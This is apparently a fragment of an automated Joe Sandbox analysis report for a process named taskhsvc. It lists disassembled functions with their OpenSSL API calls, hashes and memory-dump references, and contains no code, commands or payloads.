                                                            • Instruction ID: f3f14442d27f4242fdc60098d732dd42eb80090fcb200f9cd551563c05881bcd
                                                            • Opcode Fuzzy Hash: 740f5ac988f84e595169faa2b94fe41cae34e12164b4c0d23ecd92815542bf57
                                                            • Instruction Fuzzy Hash: 1BE128756087018FDB14DF29C280A4ABBF1FF89318F029A5DEA689B311D730E945CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF64CA0 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 156COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PKCS7_SIGNER_INFO_new.LIBEAY32 ref: 6CF64CCE
                                                              • Part of subcall function 6CF636F0: ASN1_item_new.LIBEAY32 ref: 6CF63705
                                                            • ASN1_INTEGER_set.LIBEAY32 ref: 6CF64CE6
                                                              • Part of subcall function 6CEFC200: CRYPTO_free.LIBEAY32 ref: 6CEFC22E
                                                              • Part of subcall function 6CEFC200: CRYPTO_malloc.LIBEAY32 ref: 6CEFC24A
                                                            • PKCS7_SIGNER_INFO_free.LIBEAY32 ref: 6CF64CF2
                                                              • Part of subcall function 6CF63720: ASN1_item_free.LIBEAY32 ref: 6CF6373D
                                                            • X509_get_issuer_name.LIBEAY32 ref: 6CF64D23
                                                            • X509_NAME_set.LIBEAY32 ref: 6CF64D32
                                                            • ASN1_STRING_free.LIBEAY32 ref: 6CF64D44
                                                            • X509_get_serialNumber.LIBEAY32 ref: 6CF64D53
                                                            • ASN1_STRING_dup.LIBEAY32 ref: 6CF64D5B
                                                            • CRYPTO_add_lock.LIBEAY32 ref: 6CF64D91
                                                            • EVP_MD_type.LIBEAY32 ref: 6CF64D9C
                                                            • OBJ_nid2obj.LIBEAY32 ref: 6CF64DA4
                                                            • X509_ALGOR_set0.LIBEAY32 ref: 6CF64DC3
                                                            • PKCS7_add_signer.LIBEAY32 ref: 6CF64E0A
                                                            • EVP_PKEY_get_default_digest_nid.LIBEAY32 ref: 6CF64E2B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeX509_$D_typeE_setG_dupG_freeJ_nid2objN1_item_freeN1_item_newNumberO_add_lockO_mallocO_newR_setR_set0S7_add_signerX509_get_issuer_nameX509_get_serialY_get_default_digest_nid
                                                            • String ID: A$~
                                                            • API String ID: 2913225942-3360457592
                                                            • Opcode ID: 7c9bde7fe78ec3eb58dd63fa6e152f61ea9bddd18cf444132536b36f4393237a
                                                            • Instruction ID: 0140ec34c00805f3abee9d64e26e9903b4be08d4fa7bc0d7d38d7f6f25a63502
                                                            • Opcode Fuzzy Hash: 7c9bde7fe78ec3eb58dd63fa6e152f61ea9bddd18cf444132536b36f4393237a
                                                            • Instruction Fuzzy Hash: DE61F1B5509701AFD700EF26C59469FBBF0BF85348F11881CE9A88BB40D779E948CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEB28F0 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 305COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_new__stack_chk_fail
                                                            • String ID: g$g
                                                            • API String ID: 3713409240-2431062506
                                                            • Opcode ID: 339c0f09c39900dfff33dac1dbecdab269f13034004ba709a01f619bc6336e80
                                                            • Instruction ID: b32980317b355dcab07b8c026ac6b12a94e9e1d13e34e2d33722db6953d7bc72
                                                            • Opcode Fuzzy Hash: 339c0f09c39900dfff33dac1dbecdab269f13034004ba709a01f619bc6336e80
                                                            • Instruction Fuzzy Hash: 38D114715087009FC704DF29C685A1BBBF5BF89318F26891CEAA8AB740D731E905CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEFCCE0 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 272COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_value$sk_num$N1_object_sizeN1_put_object
                                                            • String ID: A
                                                            • API String ID: 1295365991-3554254475
                                                            • Opcode ID: 33cc6a6e41c6d89713e82dd4966a83c329e23e72de837ad2b8315a413de11620
                                                            • Instruction ID: d4e7d2de122e9517ce4cd6668bddd276204de952680b9a75d2119bb213539efc
                                                            • Opcode Fuzzy Hash: 33cc6a6e41c6d89713e82dd4966a83c329e23e72de837ad2b8315a413de11620
                                                            • Instruction Fuzzy Hash: C9B103B56097019FC350EF28C18065EFBF1BF89758F218A1DE8E997750D731A946CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE72C90 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$O_malloc$R_put_error$N_div_wordN_dupN_freeN_num_bits
                                                            • String ID: A$A$gfff$h$h$}$}
                                                            • API String ID: 3061569079-2322673421
                                                            • Opcode ID: a924b298c8a142ed33b7eebef96a6de5679612187d7e37ef419da826ad873096
                                                            • Instruction ID: d6a2ea52ffe2b98927fea12f8419e587ec8d9b9c682b610e9827c25433651b45
                                                            • Opcode Fuzzy Hash: a924b298c8a142ed33b7eebef96a6de5679612187d7e37ef419da826ad873096
                                                            • Instruction Fuzzy Hash: B271ABB16083018FD721DF29C58434ABBF1EF99348F258A2DE9989BB40D774E945CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF46E50 Relevance: 36.2, APIs: 24, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,6CF42105), ref: 6CF46E79
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 41f995773ac75e5154bf3f9026be0bf478459345a3e4eaef953098ae9aa43cb8
                                                            • Instruction ID: 78a0965e8e2e182852c94b1c53288e7ad4097da451029d2ff04afca2817d1938
                                                            • Opcode Fuzzy Hash: 41f995773ac75e5154bf3f9026be0bf478459345a3e4eaef953098ae9aa43cb8
                                                            • Instruction Fuzzy Hash: 1091F9716197028FDB00DF29C58065BBBF4BF85318F12892EE9A4CBB01E735E945CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEFEC70 Relevance: 36.2, APIs: 24, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_init
                                                            • String ID: A
                                                            • API String ID: 208422987-3554254475
                                                            • Opcode ID: 2aff4eabbb2160c932062dd3c644d6cb8b0b34ed5aa886e6b1765f81c2790a12
                                                            • Instruction ID: 7060d9795a8d57728c1d00c117d58ccf18b34975c403981fb1cb34ee1d691a38
                                                            • Opcode Fuzzy Hash: 2aff4eabbb2160c932062dd3c644d6cb8b0b34ed5aa886e6b1765f81c2790a12
                                                            • Instruction Fuzzy Hash: E381C5B56097419FD700DF65C58475ABBF0BF84348F22892DE4A88BB10E779E849CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF466E0 Relevance: 34.9, APIs: 23, Instructions: 412stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sk_pop_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF467A6
                                                            • sk_new_null.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF467B3
                                                            • sk_num.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF46809
                                                            • sk_pop_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF46843
                                                            • sk_deep_copy.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF4686F
                                                            • BUF_strdup.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF468E2
                                                            • strlen.MSVCRT ref: 6CF468EE
                                                            • CRYPTO_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF4690F
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_pop_free$F_strdupO_freesk_deep_copysk_new_nullsk_numstrlen
                                                            • String ID:
                                                            • API String ID: 2820809294-0
                                                            • Opcode ID: 7e4c3cc7282ab07e67d12ccfd0f02bd01d2b95d8e59e652ecf8cbc70a4cf5cfa
                                                            • Instruction ID: c9bcefc417b92b5adbab12a848cfe476a26b43ac847b142422166caa57fe77d5
